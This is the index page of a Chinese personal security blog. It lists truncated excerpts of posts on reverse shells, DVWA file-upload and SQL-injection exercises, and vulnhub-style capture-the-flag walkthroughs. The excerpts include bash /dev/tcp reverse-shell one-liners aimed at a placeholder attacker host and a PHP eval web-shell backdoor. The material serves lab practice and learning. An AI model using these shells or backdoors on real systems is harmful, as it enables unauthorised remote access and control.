Kyon-H Blog

「离开世界之前 一切都是过程」

反弹WebShell

反弹WebShell

bash 1 2 3 4 # 攻击机 nc -lvvp port # 目标机 bash -i >& /dev/tcp/x.x.x.x/port 0>&1 1 2 3 4 5 6 7 8 9 # 方法2 exec 0&0 2>&0 0<&196;exec 196<>/dev/tcp/x.x.x.x/4444; ...

文件上传漏洞

File Upload

LOW the.php 1 <?php eval($_GET['bckdor'])?> 构造url: http://192.168.30.131/dvwa/hackable/uploads/the.php?bckdor= 1 2 phpinfo(); system('ls'); 中国菜刀 1 <?php eval($_POST['bckdor'])?&...

jangow 01

jangow 01

1. jangow 01 靶机 ip:192.168.56.118 kali 攻击机 ip:172.17.46.146 1.1. nmap 扫描 IP 靶机 IP 已知: 1 nmap -A 192.168.56.118 1.2. 扫描目录 1 dirb http://192.168.56.118 1 2 3 http://192.168.56.118/server-...

The PLANETS:EARTH

The PLANETS:EARTH

The PLANETS:EARTH kali 攻击机 ip:192.168.30.130 靶机 ip:192.168.30.136 注:靶机若为仅主机模式,后面无法反弹 shell 1. 网络扫描 1 arp-scan -l 1 nmap -A 192.168.30.136 DNS:earth.local, DNS:terratest.earth.local 发现...

Web Machine (N7)

Web Machine (N7)

1. Web Machine (N7) 靶机 ip:192.168.56.101 kali 攻击机 ip:192.168.56.102 注:关于 vmware 和 virtual box 虚拟机如何建立网络连接,详见:不同虚拟化平台的虚拟机之间进行网络通信 - 简书 1.1. 使用 nmap 扫描 c 段 1 2 3 4 nmap -sS 192.168.56.0/24 # 发现1...

EMPIRE: LUPINONE

EMPIRE: LUPINONE

EMPIRE: LUPINONE Difficulty: Medium kali攻击机ip:192.168.30.130 靶机ip:192.168.30.135 网络扫描 1 nmap -A 192.168.30.135 开放22、80端口,扫描文件 1 dirb 192.168.30.135 发现robots.txt,内容: 1 2 User-agent: * Di...

Prime_Series_Level-1

Prime_Series_Level-1

1. Prime_Series_Level-1 1.1. IP 扫描 使用 nmap 1 nmap -sP 192.168.30.0/24 ip 为 192.168.30.134 1 nmap -A 192.168.30.134 开放端口 80 和 22 1.2. 目录扫描 1 dirb http://192.168.30.134 发现有 wordpress(博客...

dvwa、pikachu 之SQL注入

dvwa、pikachu 之 sql 注入

1. SQL 注入 手工注入常规思路: 1 2 3 4 5 6 7 1.判断是否存在注入,注入是字符型还是数字型 2.猜解 SQL 查询语句中的字段数 3.确定显示的字段顺序 4.获取当前数据库 5.获取数据库中的表 6.获取表中的字段名 7.查询到账户的数据 1.1. 手工注入 1.1.1. LOW 1.判断是否存在注入,注入是字符型还是数字型 1 2 3 4 ' 1' an...